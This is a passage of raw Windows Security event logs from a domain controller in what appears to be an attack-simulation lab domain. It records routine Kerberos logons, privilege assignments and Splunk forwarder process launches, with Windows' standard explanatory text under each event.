Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263831
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x76A521
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51566
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263830
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76A521
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:30:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263833
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263835
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263834
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263836
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x154c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263837
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1200
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263839
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1abc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263838
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1284
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263842
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76DF6D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:30:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263841
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x76DF6D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51579
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:30:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263840
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76DF6D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:31:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263843
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263845
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263844
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x618
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263846
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263847
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x76FA26
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53145
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:31:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263848
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1848
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263850
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263849
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263852
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x770E30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51584
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
